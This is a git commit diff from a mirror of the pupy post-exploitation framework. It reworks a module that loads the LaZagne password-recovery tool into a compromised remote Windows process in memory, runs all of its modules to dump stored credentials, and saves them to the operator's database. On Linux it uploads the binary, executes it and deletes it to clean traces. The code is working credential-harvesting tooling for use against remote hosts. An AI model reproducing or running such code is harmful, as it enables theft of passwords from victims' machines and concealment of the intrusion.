mirror of https://github.com/n1nj4sec/pupy.git
In-memory LaZagne module from AlessandroZ
This commit is contained in:
parent
d00ed46a91
commit
f0e60a7606
|
@ -10,3 +10,7 @@
|
|||
path = pupy/external/LaZagne
|
||||
url = https://github.com/AlessandroZ/LaZagne
|
||||
shallow = true
|
||||
[submodule "pupy/external/impacket"]
|
||||
path = pupy/external/impacket
|
||||
url = https://github.com/CoreSecurity/impacket
|
||||
shallow = true
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340
|
|
@ -1,4 +1,6 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
# Author: AlessandroZ
|
||||
|
||||
from pupylib.PupyModule import *
|
||||
from pupylib.PupyCompleter import *
|
||||
from rpyc.utils.classic import upload
|
||||
|
@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials
|
|||
import tempfile
|
||||
import subprocess
|
||||
import os.path
|
||||
from pupylib.utils.rpyc_utils import redirected_stdo
|
||||
|
||||
__class_name__="LaZagne"
|
||||
|
||||
|
@ -16,56 +19,100 @@ class LaZagne(PupyModule):
|
|||
"""
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
|
||||
self.arg_parser.add_argument("-v", "--verbose", action='store_true')
|
||||
|
||||
def run(self, args):
|
||||
platform=self.client.desc["platform"]
|
||||
isWindows = True
|
||||
if "Windows" in platform:
|
||||
lazagne_path = self.client.pupsrv.config.get("lazagne","win")
|
||||
if "64" in self.client.desc["proc_arch"]:
|
||||
self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'')
|
||||
return
|
||||
|
||||
# load all dependency
|
||||
self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll")))
|
||||
self.client.load_package("sqlite3")
|
||||
self.client.load_package("_sqlite3")
|
||||
self.client.load_package("xml")
|
||||
self.client.load_package("_elementtree")
|
||||
self.client.load_package("pyexpat") # needed for _elementtree module
|
||||
self.client.load_package("win32crypt")
|
||||
self.client.load_package("win32api")
|
||||
self.client.load_package("win32con")
|
||||
self.client.load_package("win32cred")
|
||||
self.client.load_package("colorama")
|
||||
self.client.load_package("impacket")
|
||||
self.client.load_package("calendar")
|
||||
self.client.load_package("win32security")
|
||||
self.client.load_package("win32net")
|
||||
self.client.load_package("lazagne")
|
||||
|
||||
db = Credentials()
|
||||
|
||||
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
|
||||
for module in moduleNames:
|
||||
if args.verbose:
|
||||
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
|
||||
passwords = module.run(module.options['dest'].capitalize())
|
||||
self.print_results(module.options['dest'].capitalize(), passwords, db)
|
||||
|
||||
elif "Linux" in platform:
|
||||
isWindows = False
|
||||
if "64" in self.client.desc["os_arch"]:
|
||||
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
|
||||
else:
|
||||
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
|
||||
else:
|
||||
self.error("Platform not supported")
|
||||
return
|
||||
|
||||
if not os.path.isfile(lazagne_path):
|
||||
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
|
||||
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
|
||||
return
|
||||
|
||||
tf = tempfile.NamedTemporaryFile()
|
||||
dst = tf.name
|
||||
tf.file.close()
|
||||
|
||||
if not os.path.isfile(lazagne_path):
|
||||
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
|
||||
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
|
||||
return
|
||||
|
||||
tf = tempfile.NamedTemporaryFile()
|
||||
dst = tf.name
|
||||
if isWindows:
|
||||
remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||
tfName = tf.name.split(os.sep)
|
||||
tfName = tfName[len(tfName)-1] + '.exe'
|
||||
dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName)
|
||||
tf.file.close()
|
||||
|
||||
self.success("Uploading laZagne to: %s" % dst)
|
||||
upload(self.client.conn, lazagne_path, dst)
|
||||
|
||||
if not isWindows:
|
||||
self.success("Uploading laZagne to: %s" % dst)
|
||||
upload(self.client.conn, lazagne_path, dst)
|
||||
|
||||
self.success("Adding execution permission")
|
||||
cmd = ["chmod", "+x", dst]
|
||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||
|
||||
self.success("Executing")
|
||||
cmd = [dst, "all"]
|
||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||
self.success("%s" % output)
|
||||
|
||||
creds = self.parse_output(output)
|
||||
db = Credentials()
|
||||
db.add(creds)
|
||||
self.success("Passwords stored on the database")
|
||||
|
||||
self.success("Cleaning traces")
|
||||
self.client.conn.modules['os'].remove(dst)
|
||||
self.success("Executing")
|
||||
cmd = [dst, "all"]
|
||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||
self.success("%s" % output)
|
||||
|
||||
creds = self.parse_output(output)
|
||||
db = Credentials()
|
||||
db.add(creds)
|
||||
self.success("Passwords stored on the database")
|
||||
|
||||
self.success("Cleaning traces")
|
||||
self.client.conn.modules['os'].remove(dst)
|
||||
|
||||
else:
|
||||
self.error("Platform not supported")
|
||||
return
|
||||
|
||||
def print_results(self, module, creds, db):
|
||||
if creds:
|
||||
print "\n############## %s passwords ##############\n" % module
|
||||
clean_creds = []
|
||||
for cred in creds:
|
||||
clean_cred = {}
|
||||
clean_cred['Tool'] = 'Lazagne'
|
||||
for c in cred.keys():
|
||||
clean_cred[c] = cred[c].encode('utf-8')
|
||||
print "%s: %s" % (c, cred[c])
|
||||
print
|
||||
clean_creds.append(clean_cred)
|
||||
|
||||
try:
|
||||
db.add(clean_creds)
|
||||
self.success("Passwords stored on the database")
|
||||
except Exception, e:
|
||||
print e
|
||||
|
||||
def parse_output(self, output):
|
||||
creds = []
|
||||
|
@ -110,5 +157,5 @@ class LaZagne(PupyModule):
|
|||
key, value = line.split(':', 1)
|
||||
cred[key] = value.strip()
|
||||
except:
|
||||
pass
|
||||
return creds
|
||||
pass
|
||||
return creds
|
||||
|
|
Loading…
Reference in New Issue